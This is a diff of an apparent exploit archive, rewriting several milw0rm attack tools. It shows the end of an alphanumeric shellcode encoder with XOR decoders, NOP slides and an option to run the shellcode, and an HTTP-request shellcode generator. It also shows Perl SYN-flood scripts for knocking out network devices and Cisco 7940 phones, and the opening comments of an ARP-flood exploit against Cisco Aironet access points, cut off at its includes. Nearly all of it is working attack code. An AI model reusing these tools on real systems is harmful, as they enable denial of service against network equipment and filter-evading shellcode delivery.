// | | + *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | + *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | + // | | + memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | + randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' + SIZE_RANDOMIZED_DECODER_HEAD); ////// | + //set first xor1 to random alnum value (this is the first byte of the encoded data) // | + xor1 = get_random_alnum_value(); // | + printf("xor1=0x%2X - %s\n", // | + (UCHAR)xor1, // | + is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | + ///////////////////////////////////////////////////////// | +RE_RUN: // | + sprintf(alnum_shellcode, "%s",decoder); // | + memset(temp_buf, 0, 3);/////////////////// | + for(i=0; ikey; // | + xor2=p_xor2_key->xor2; // | + temp_buf[0] = xor1; // | + temp_buf[1] = xor2; // | + strcat(alnum_shellcode, temp_buf); // append it to our decoder // | + xor1=key; // | + free_p_xor2_key(p_xor2_key); // free the list // | + } //get next original_byte // | + //////////////////////// | + if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | + { // | + printf("error - terminating key found in encoded shellcode. running again to fix\n");// | + goto RE_RUN; // | + } ///////////////////////////////////////////////////// | + *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | + *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| + *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| + *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| + strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | + (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | + 4); // | + // | + //bugfix: handle case of esp pointing to shellcode // | + if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | + { // | + // _asm{ // | + // push esp; // | + // pop eax; // | + // xor al, 0x36; // | + // xor al, 0x30; // | + // } // | + p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | + memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | + memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | + p_alnum_shellcode[0] = 'T'; // | + p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | + p_alnum_shellcode[2] = '4'; // and using other xor values // | + p_alnum_shellcode[3] = '6'; // <-- (x+6) // | + p_alnum_shellcode[4] = '4'; // // | + p_alnum_shellcode[5] = '0'; // <-- x // | + p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | + p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | + size_decoder += 6; // | + } // | + // | + printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | + printf("decoder length: %d\n%s\n", // | + size_decoder, // | + p_alnum_shellcode); // | + // | + printf("scanning alnum_shellcode for shellcode up to size bytes\n"); // | + found_msg = scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | + if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | + else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | + // | + if (str_is_alnum(alnum_shellcode)) // | + { // | + printf("execute shellcode locally? (hit: y and press enter): ");// | + if(tolower(getchar()) == 'y') // | + { ///////////// | + _asm // | + { // | + push p_alnum_shellcode; //////// | + pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' + //jump to head of decoder // + jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// + } ////////////// + } // + } // + else // + { /////////////// + printf("error non-alphanumeric shellcode\n"); // + } ////////////////////////////// + ///////// + // + return 0; ////// +} // +/////////////////// + +BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, + UCHAR *known_pattern, + UINT known_pattern_length, + UINT offset1, + UINT offset2, + UINT offset3) +{ + UINT offset, + i, + found; + + for (i=found=offset=0; i0;length--) { + if( + !is_alnum(str[length-1]) + ) + return 0; + } + return 1; +} + +UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) +{ + int xor_complement_1, xor_complement_2; + UCHAR two_xor_complements[3]; + + for(xor_complement_1=0; xor_complement_1 255 ? -1 : (x[3] <<= 24); + x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); + x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); + x[0] = x[0] > 255 ? -1 : (x[0] <<= 0); + dwIpAddress = x[0]+x[1]+x[2]+x[3]; + + + return dwIpAddress; +} + +DWORD my_htonl(DWORD dw_in) +{ + DWORD dw_out; + + *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0); + *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1); + *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2); + *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3); + + return dw_out; +} + +void free_p_xor2_key(struct xor2_key *node) +{ + struct xor2_key *temp = 0; + + if(node) + { + temp = node->prev; + while(node->next) + { + node=node->next; + free(node->prev); + } + free(node); + } + if(temp) + { + while(temp->prev) + { + temp=temp->prev; + free(temp->next); + } + free(temp); + } +} + +struct xor2_key *choose_random_node(struct xor2_key *head) +{ + int num_nodes = 1, selected_node, i; + struct xor2_key* tail = head; + + struct xor2_key* pn = NULL ; + + if (!head || !head->key) + return 0; + + while(tail->next) + { + tail = tail->next; + num_nodes++; + } + + selected_node = rand()%num_nodes; + + for(i=0; inext; + + return head; +} + +struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c) +{ + struct xor2_key *p_xor2_key, *p_xor2_key_head; + char *alnum = ALNUM_CHARSET; + UINT i=0, + z=1, + r=0, + count=0; + UCHAR xor2=0, + x=0; + + p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key)); + p_xor2_key->prev = 0; + p_xor2_key->next = 0; + p_xor2_key->key = 0; + p_xor2_key->xor2 = 0; + + for(i=0; alnum[i]; i++) + { + for(x=0; alnum[x];x++) + { + xor2 = alnum[x]; + if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c) + { + p_xor2_key->xor2 = xor2; + p_xor2_key->key = alnum[i]; + p_xor2_key->next = malloc(sizeof(struct xor2_key)); + p_xor2_key->next->prev = p_xor2_key; + p_xor2_key = p_xor2_key->next; + p_xor2_key->key=0; + p_xor2_key->xor2=0; + } + } + } + + if(!p_xor2_key->key) + p_xor2_key->next = 0; + if (p_xor2_key->prev) + p_xor2_key = p_xor2_key->prev; + else + return 0; + free(p_xor2_key->next); + p_xor2_key->next=0; + return p_xor2_key_head; +} + +UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null. +{ + UINT last, randomNum; + UCHAR temporary; + UCHAR *output = malloc(length); + memcpy(output, str, length); + for (last = length; last > 1; last--) + { + randomNum = rand( ) % last; + temporary = output[randomNum]; + output[randomNum] = output[last-1]; + output[last-1] = temporary; + } + memcpy(str, output, length); + return output; +}// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm + + +UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) +{ + UCHAR *prefix_substr, + *substr, + *suffix_substr, + *output_str; + UINT prefix_substr_len, + suffix_substr_len; + + + if(slide > substr_offset) { + printf("you can't slide it that far back!\n"); + return 0; + } + + output_str = malloc(str_len); + memset(output_str, 0 , str_len); + + suffix_substr_len = str_len-substr_len-substr_offset; + suffix_substr = malloc(suffix_substr_len); + memset(suffix_substr, 0, suffix_substr_len); + + prefix_substr_len = substr_offset; + prefix_substr = malloc(prefix_substr_len); + memset(prefix_substr, 0, prefix_substr_len); + + substr = malloc(substr_len); + memset(substr, 0, substr_len); + + strncpy(substr, str+substr_offset, substr_len); + strncpy(prefix_substr, str, prefix_substr_len); + strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); + + strncpy(output_str, prefix_substr, prefix_substr_len-slide); + strncpy(output_str+prefix_substr_len-slide, substr, substr_len); + strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide); + strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len); + + + free(prefix_substr); + free(suffix_substr); + free(substr); + return output_str; +} + +UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) +{ + UCHAR *prefix_substr, + *substr, + *suffix_substr, + *output_str; + UINT prefix_substr_len, + suffix_substr_len; + + + if(slide > str_len-substr_len-substr_offset) { + printf("you can't slide it that far forward!\n"); + return 0; + } + + output_str = malloc(str_len); + memset(output_str, 0 , str_len); + + suffix_substr_len = str_len-substr_len-substr_offset; + suffix_substr = malloc(suffix_substr_len); + memset(suffix_substr, 0, suffix_substr_len); + + prefix_substr_len = substr_offset; + prefix_substr = malloc(prefix_substr_len); + memset(prefix_substr, 0, prefix_substr_len); + + substr = malloc(substr_len); + memset(substr, 0, substr_len); + + strncpy(substr, str+substr_offset, substr_len); + strncpy(prefix_substr, str, prefix_substr_len); + strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); + + strncpy(output_str, prefix_substr, prefix_substr_len); + strncpy(output_str+prefix_substr_len, suffix_substr, slide); + strncpy(output_str+prefix_substr_len+slide, substr, substr_len); + strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide); + + + free(prefix_substr); + free(suffix_substr); + free(substr); + return output_str; +} + +UCHAR *get_nop_slide(UINT size, UINT slide) +{ //simple alnum nop slide generator + UINT i, x, append_dec_eax = 0; + UCHAR alnum_nop[][3] = { + "AI", //inc ecx;dec ecx // (alnum_nop[0]) + "BJ", //inc edx;dec edx // (alnum_nop[1]) + "CK", //inc ebx;dec ebx // (alnum_nop[2]) + "EM", //inc ebp;dec ebp // (alnum_nop[3]) + "FN", //inc esi;dec esi // (alnum_nop[4]) + "GO", //inc edi;dec edi // (alnum_nop[5]) [we don't care about eax value before the imul] + "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ] + "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all. ] + + "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--. //we can freely inc/dec esp for now +// "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account +// "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from +// "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack. +// | +//TODO: <-----------------------------------------------------------------------------------' +// push eax push eax push eax push ecx push edx +// pop eax push ecx push ecx dec esp pop edx +// push ecx pop ecx push edx inc esp push ecx +// pop ecx pop eax inc esp pop ecx pop ecx +// push edx push edx dec esp push eax push eax +// pop edx pop edx pop edx inc esp pop eax +// pop ecx dec esp . +// pop eax pop eax . +// push edx . +// pop edx etc... + }; + UCHAR *nop_slide; + nop_slide = malloc(size); + memset(nop_slide, 0, size); + if(size%2) + { + append_dec_eax = 1; + size--; + } + for(i=0; i<(size/2); i++) { + do + x = rand()%(sizeof(alnum_nop)/3); + while + ((slide==2)&&(x==6||x==7)); + strcat(nop_slide, alnum_nop[x]); + } + if(append_dec_eax) + { + strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide + } + return nop_slide; +} + +UCHAR get_random_alnum_push_dword_opcode() +{ + UCHAR alnum_push_dword_opcode[] = + { + 'P', //0x50 push eax + 'Q', //0x51 push ecx + 'R', //0x52 push edx + 'S', //0x53 push ebx + 'T', //0x54 push esp + 'U', //0x55 push ebp + 'V', //0x56 push esi + 'W' //0x57 push edi + }; + return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)]; +} + +UCHAR get_random_alnum_value() +{ + char alnum_values[] = ALNUM_CHARSET; + return alnum_values[rand()%strlen(alnum_values)]; +} + +UCHAR get_push_register_instruction(UCHAR *reg) +{ + if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax + else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx + else if (!strcmp(reg, "edx")) return 'R'; //0x52 push edx + else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx + else if (!strcmp(reg, "esp")) return 'T'; //0x54 push esp + else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp + else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi + else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi + else return 0; +} + +UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1) +{ + UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10}; + UCHAR instructions[11][3]; + UCHAR instruction_comments[11][28]; + UINT i,c, state; + UCHAR *output; + UCHAR *random_states; + UCHAR *p_state[5]; + + output = malloc(17); + memset(output, 0, 17); + memset(instructions, 0, 11*3); + memset(instruction_comments, 0, 11*28); + instructions[0][0] = '\x6a'; //j + instructions[0][1] = xor_al1; // + instructions[1][0] = '\x58'; //X + instructions[2][0] = '\x34'; //4 + instructions[2][1] = xor_al1; // + instructions[3][0] = '\x48'; //H + instructions[4][0] = '\x34'; //4 + instructions[4][1] = jne_xor1; // + instructions[5][0] = '\x30'; //0 + instructions[5][1] = '\x42'; //B + instructions[5][2] = size_decoder-1; // + instructions[6][0] = '\x52'; //R + instructions[7][0] = '\x52'; //R + instructions[8][0] = '\x59'; //Y + instructions[9][0] = '\x47'; //G + instructions[10][0] = '\x43'; //C + + strcat(instruction_comments[0], "push XOR_AL1"); + strcat(instruction_comments[1], "pop eax"); + strcat(instruction_comments[2], "xor al, XOR_AL1"); + strcat(instruction_comments[3], "dec eax"); + strcat(instruction_comments[4], "xor al, JNE_XOR1"); + strcat(instruction_comments[5], "xor byte ptr [edx+size], al"); + strcat(instruction_comments[6], "push edx"); + strcat(instruction_comments[7], "push edx"); + strcat(instruction_comments[8], "pop ecx"); + strcat(instruction_comments[9], "inc edi"); + strcat(instruction_comments[10], "inc ebx"); + do { + memset(p_state, 0, sizeof(UCHAR*)*5); + random_states = shuffle(states, 11); + + //.*0.*1.*2.*3.*4.*5 + p_state[0] = memchr(random_states, 0, 11); + if(p_state[0]) + p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states)); + if(p_state[1]) + p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states)); + if(p_state[1]) + p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states)); + if(p_state[1]) + p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states)); + if(p_state[1]) + p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states)); + + //.*[67].*8 + if(p_state[1]) + { + p_state[2] = memchr(random_states, 6, 11); + p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); + if(!p_state[3]) + { + p_state[2] = memchr(random_states, 7, 11); + p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); + } + if(p_state[3]) + { + //.*1.*[67].*[67] + if(p_state[2] && p_state[1] < p_state[2]) + p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states)); + + //.*0.*[67].*8.*1 + if(!p_state[4]) + p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); + if(!p_state[4]) + p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states)); + if(p_state[4]) + p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states)); + if(p_state[4]) + p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states)); + + //.*[67].*8.*0.*1.*[67] + if(!p_state[4]) + p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states)); + if(p_state[4]) + p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states)); + if(p_state[4]) + p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states)); + } + } + + } + while (!p_state[4]); + + for (c=state=0; state -#include -#include -#include -#include - -#define X86_PUSH \ - 0x68 - -#define X86_MOV_TO_DL(x) \ - printf("\t\"\\xb2\\x%02x\"\n", x & 0xFF); - -#define X86_MOV_TO_DX(x) \ - printf("\t\"\\x66\\xba\\x%02x\\x%02x\"\n", \ - (x & 0xFF), ((x >> 8) & 0xFF)); - -#define X86_MOV_TO_EDX(x) \ - printf("\t\"\\xba\\x%02x\\x%02x\\x%02x\\x%02x\"\n", \ - (x & 0xFF), ((x >> 8) & 0xFF), ((x >> 16) & 0xFF), ((x >> 24) & 0xFF)); - -void usage(char *); -int printx(char *fmt, ...); - -int main(int argc, char **argv) { - - if (argc < 2) { - usage(argv[0]); - return -1; - } - - if (argv[2][0] != '/') { - - fprintf(stderr, "filename must begin with '/' as any sane URL! (e.g. /index.html)\n"); - - return -1; - } - - if (!strcmp(argv[1], "-0")) { - - return printx("GET %s HTTP/1.0\r\n\r\n", argv[2]); - } - - if (!strcmp(argv[1], "-1")) { - - if (argc != 4) { - - fprintf(stderr, "missing , required parameter for HTTP/1.1 header! (e.g. www.tty64.org)\n"); - - return -1; - } - - return printx("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n", argv[2], argv[3]); - } - - fprintf(stderr, "%s: unknown http protocol, try -0 or -1\n", argv[1]); - - return -1; -} - -/* - * usage, display usage screen - * * basename, barrowed argv[0] - */ - -void usage(char *basename) { - - printf( - "usage: %s <-0|-1> []\n\n" - "\t -0, HTTP/1.0 GET request\n" - "\t -1, HTTP/1.1 GET request\n" - "\t , given filename (e.g. /shellcode.bin)\n" - "\t , given hostname (e.g. www.tty64.org) [required for HTTP 1.1]\n\n", - basename); - - return ; -} - -/* - * printx, fmt string. generate the shellcode chunk - * * fmt, given format string - */ - -int printx(char *fmt, ...) { - va_list ap; - char buf[256], pad_buf[4], *w_buf; - int pad_length, buf_length, i, tot_length; - - memset(buf, 0x0, sizeof(buf)); - - va_start(ap, fmt); - vsnprintf(buf, sizeof(buf), fmt, ap); - va_end(ap); - - buf_length = strlen(buf); - - printf("\nURL: %s\n", buf); - printf("Header Length: %d bytes\n", buf_length); - - for (i = 1; buf_length > (i * 4); i++) { - pad_length = ((i+1)*4) - buf_length; - } - - printf("Padding Length: %d bytes\n\n", pad_length); - - tot_length = buf_length + pad_length; - - w_buf = buf; - - if (pad_length) { - - w_buf = calloc(tot_length, sizeof(char)); - - if (!w_buf) { - - perror("calloc"); - return -1; - } - - i = index(buf, '/') - buf; - - memset(pad_buf, 0x2f, sizeof(pad_buf)); - - memcpy(w_buf, buf, i); - memcpy(w_buf+i, pad_buf, pad_length); - memcpy(w_buf+pad_length+i, buf+i, buf_length - i); - } - - for (i = tot_length - 1; i > -1; i-=4) { - - printf("\t\"\\x%02x\\x%02x\\x%02x\\x%02x\\x%02x\" // pushl $0x%02x%02x%02x%02x\n", - X86_PUSH, w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i], w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i]); - } - - if (pad_length) { - - free(w_buf); - } - - // - // The EDX register is assumed to be zero-out within the shellcode. - // - - if (tot_length < 256) { - - // 8bit value - - X86_MOV_TO_DL(tot_length); - - } else if (tot_length < 655356) { - - // 16bit value - - X86_MOV_TO_DX(tot_length); - - } else { - - // 32bit value, rarely but possible ;-) - - X86_MOV_TO_EDX(tot_length); - - } - - fputc('\n', stdout); - - return 1; -} - +/* + * gen_httpreq.c, utility for generating HTTP/1.x requests for shellcodes + * + * SIZES: + * + * HTTP/1.0 header request size - 18 bytes+ + * HTTP/1.1 header request size - 26 bytes+ + * + * NOTE: The length of the selected HTTP header is stored at EDX register. + * Thus the generated MOV instruction (to EDX/DX/DL) is size-based. + * + * - izik@tty64.org + */ + +#include +#include +#include +#include +#include + +#define X86_PUSH \ + 0x68 + +#define X86_MOV_TO_DL(x) \ + printf("\t\"\\xb2\\x%02x\"\n", x & 0xFF); + +#define X86_MOV_TO_DX(x) \ + printf("\t\"\\x66\\xba\\x%02x\\x%02x\"\n", \ + (x & 0xFF), ((x >> 8) & 0xFF)); + +#define X86_MOV_TO_EDX(x) \ + printf("\t\"\\xba\\x%02x\\x%02x\\x%02x\\x%02x\"\n", \ + (x & 0xFF), ((x >> 8) & 0xFF), ((x >> 16) & 0xFF), ((x >> 24) & 0xFF)); + +void usage(char *); +int printx(char *fmt, ...); + +int main(int argc, char **argv) { + + if (argc < 2) { + usage(argv[0]); + return -1; + } + + if (argv[2][0] != '/') { + + fprintf(stderr, "filename must begin with '/' as any sane URL! (e.g. /index.html)\n"); + + return -1; + } + + if (!strcmp(argv[1], "-0")) { + + return printx("GET %s HTTP/1.0\r\n\r\n", argv[2]); + } + + if (!strcmp(argv[1], "-1")) { + + if (argc != 4) { + + fprintf(stderr, "missing , required parameter for HTTP/1.1 header! (e.g. www.tty64.org)\n"); + + return -1; + } + + return printx("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n", argv[2], argv[3]); + } + + fprintf(stderr, "%s: unknown http protocol, try -0 or -1\n", argv[1]); + + return -1; +} + +/* + * usage, display usage screen + * * basename, barrowed argv[0] + */ + +void usage(char *basename) { + + printf( + "usage: %s <-0|-1> []\n\n" + "\t -0, HTTP/1.0 GET request\n" + "\t -1, HTTP/1.1 GET request\n" + "\t , given filename (e.g. /shellcode.bin)\n" + "\t , given hostname (e.g. www.tty64.org) [required for HTTP 1.1]\n\n", + basename); + + return ; +} + +/* + * printx, fmt string. generate the shellcode chunk + * * fmt, given format string + */ + +int printx(char *fmt, ...) { + va_list ap; + char buf[256], pad_buf[4], *w_buf; + int pad_length, buf_length, i, tot_length; + + memset(buf, 0x0, sizeof(buf)); + + va_start(ap, fmt); + vsnprintf(buf, sizeof(buf), fmt, ap); + va_end(ap); + + buf_length = strlen(buf); + + printf("\nURL: %s\n", buf); + printf("Header Length: %d bytes\n", buf_length); + + for (i = 1; buf_length > (i * 4); i++) { + pad_length = ((i+1)*4) - buf_length; + } + + printf("Padding Length: %d bytes\n\n", pad_length); + + tot_length = buf_length + pad_length; + + w_buf = buf; + + if (pad_length) { + + w_buf = calloc(tot_length, sizeof(char)); + + if (!w_buf) { + + perror("calloc"); + return -1; + } + + i = index(buf, '/') - buf; + + memset(pad_buf, 0x2f, sizeof(pad_buf)); + + memcpy(w_buf, buf, i); + memcpy(w_buf+i, pad_buf, pad_length); + memcpy(w_buf+pad_length+i, buf+i, buf_length - i); + } + + for (i = tot_length - 1; i > -1; i-=4) { + + printf("\t\"\\x%02x\\x%02x\\x%02x\\x%02x\\x%02x\" // pushl $0x%02x%02x%02x%02x\n", + X86_PUSH, w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i], w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i]); + } + + if (pad_length) { + + free(w_buf); + } + + // + // The EDX register is assumed to be zero-out within the shellcode. + // + + if (tot_length < 256) { + + // 8bit value + + X86_MOV_TO_DL(tot_length); + + } else if (tot_length < 655356) { + + // 16bit value + + X86_MOV_TO_DX(tot_length); + + } else { + + // 32bit value, rarely but possible ;-) + + X86_MOV_TO_EDX(tot_length); + + } + + fputc('\n', stdout); + + return 1; +} + // milw0rm.com [2006-10-22] \ No newline at end of file diff --git a/platforms/hardware/dos/1153.pl b/platforms/hardware/dos/1153.pl index e8108f2c2..9aa0f52fb 100755 --- a/platforms/hardware/dos/1153.pl +++ b/platforms/hardware/dos/1153.pl @@ -55,6 +55,6 @@ close $sox; print color 'bold blue'; print "ping the remote device $victim again\n"; print color 'reset'; -system("ping -c 3 $victim"); - -# milw0rm.com [2005-08-12] +system("ping -c 3 $victim"); + +# milw0rm.com [2005-08-12] diff --git a/platforms/hardware/dos/1338.pl b/platforms/hardware/dos/1338.pl index 52465a27d..2bafc83af 100755 --- a/platforms/hardware/dos/1338.pl +++ b/platforms/hardware/dos/1338.pl @@ -1,107 +1,107 @@ -# The easy way by logic logidev@gmail.com (line 2) untested /str0ke -# hping -c 1 -S -s 31337 -k -b -p 22 10.0.xx.xxx - -#!/usr/bin/perl -eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@; -eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@; -eval ("use Term::ProgressBar;"); -die "[error] Term::ProgressBar perl module is not installed \n" if $@; -my $VERSION = "0.1"; -print "$0, $PgmName, V $VERSION \n"; -GetOptions ( -"help" =>\$usage, -"device=s" => \$device, -"source=s" =>\$sourceip, -"dest=s"=>\$destip, -"sourcemac=s"=>\$sourcemac, -"destmac=s"=>\$destmac, -"port=n"=> \$tcpport, -); - -######################## Config option #################### - -my $timeout = "0,1"; # Timeout - -if ($usage) {&usage;} - -if (!$device) { -$device= 'eth0'; # Network device -} - -if (!$destmac) {print "Dest MAC not found \n"; &usage;} -if (!$sourceip) {print "Source IP not found \n"; &usage;} -if (!$destip) {print "Dest IP not found \n"; &usage;} -if (!$tcpport) {print "TCP port not found \n"; &usage;} - -my $syn="1"; # TCP SYN SET -my $tcpdata = "TEST"; # TCP payload -my $count=0; - -###################################################### - -#Initialize Progres Bar -my $progress = Term::ProgressBar->new(32768); -$progress->minor(0); -$packet = new Net::RawIP; -$packet-> ethnew($device); - - -if (!$sourcemac) { -$packet -> ethset( dest => $destmac); -}else { -$packet -> ethset( source =>$sourcemac, dest => $destmac); -} - - - -for ($count=0; $count< 65537 ; $count++) { - -$packet->set({ - -ip => { -saddr => $sourceip, -daddr => $destip -}, - -tcp => { -check => 0x0010 , # TCP Packet Checksum 0 for auto correct -source => $count, -dest => $tcpport, -syn => $syn, -data => $tcpdata -}}); -$packet->ethsend($timeout); -#$packet->send($timeout); - -$progress->update($_); -$count++; -} - -sub usage { -print <\$usage, +"device=s" => \$device, +"source=s" =>\$sourceip, +"dest=s"=>\$destip, +"sourcemac=s"=>\$sourcemac, +"destmac=s"=>\$destmac, +"port=n"=> \$tcpport, +); + +######################## Config option #################### + +my $timeout = "0,1"; # Timeout + +if ($usage) {&usage;} + +if (!$device) { +$device= 'eth0'; # Network device +} + +if (!$destmac) {print "Dest MAC not found \n"; &usage;} +if (!$sourceip) {print "Source IP not found \n"; &usage;} +if (!$destip) {print "Dest IP not found \n"; &usage;} +if (!$tcpport) {print "TCP port not found \n"; &usage;} + +my $syn="1"; # TCP SYN SET +my $tcpdata = "TEST"; # TCP payload +my $count=0; + +###################################################### + +#Initialize Progres Bar +my $progress = Term::ProgressBar->new(32768); +$progress->minor(0); +$packet = new Net::RawIP; +$packet-> ethnew($device); + + +if (!$sourcemac) { +$packet -> ethset( dest => $destmac); +}else { +$packet -> ethset( source =>$sourcemac, dest => $destmac); +} + + + +for ($count=0; $count< 65537 ; $count++) { + +$packet->set({ + +ip => { +saddr => $sourceip, +daddr => $destip +}, + +tcp => { +check => 0x0010 , # TCP Packet Checksum 0 for auto correct +source => $count, +dest => $tcpport, +syn => $syn, +data => $tcpdata +}}); +$packet->ethsend($timeout); +#$packet->send($timeout); + +$progress->update($_); +$count++; +} + +sub usage { +print < " unless ($ARGV[4]); -$pkt->set({ - ip => { - saddr => $ARGV[0], - daddr => $ARGV[1] - }, - tcp=> { dest => $ARGV[2], - syn => 1, - seq => 0, - ack => 0} - }); -for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; }; - -# milw0rm.com [2006-01-10] +#!/usr/bin/perl +# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this. +# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my +# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!! +# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny +# protocol - this is not for the SIP firmware. + +use Net::RawIP; +use Time::HiRes; +$pkt = new Net::RawIP; +die "Usage $0 " unless ($ARGV[4]); +$pkt->set({ + ip => { + saddr => $ARGV[0], + daddr => $ARGV[1] + }, + tcp=> { dest => $ARGV[2], + syn => 1, + seq => 0, + ack => 0} + }); +for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; }; + +# milw0rm.com [2006-01-10] diff --git a/platforms/hardware/dos/1447.c b/platforms/hardware/dos/1447.c index e8771e5f3..5e329c988 100755 --- a/platforms/hardware/dos/1447.c +++ b/platforms/hardware/dos/1447.c @@ -1,109 +1,109 @@ -// -// Cisco Killer - ciskill.c -// -// Usage: ./ciskill [device] -// -// Author: Pasv (pasvninja [at] gmail.com) -// -// Credit: This exploit takes advantage of a vulnerability that was -// discovered by Eric Smith on January 12, 2006 (bid:16217) -// -// Greets to NW, zimmy, GSO, and the rest. -// -// Description: The vulnerability exists in the way the affected versions -// below handle ARP replies, if enough specially crafted ARP packets are sent -// on the network with the affected systems it will cause the access point memory -// exhaustion which will in a few seconds (depending on the speed of the attacker -// and the memory of the target) crash the system, making all ingoing/outgoing -// traffic stopped. -// -// Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility -// for your actions (like a knife maker). -// -// Versions affected: -// Cisco Aironet 350 IOS -// Cisco Aironet 1400 -// Cisco Aironet 1300 -// Cisco Aironet 1240AG -// Cisco Aironet 1230AG -// Cisco Aironet 1200 -// Cisco Aironet 1130AG -// Cisco Aironet 1100 -// (this includes most linksys wireless access points) - - - -#include -#include -#include 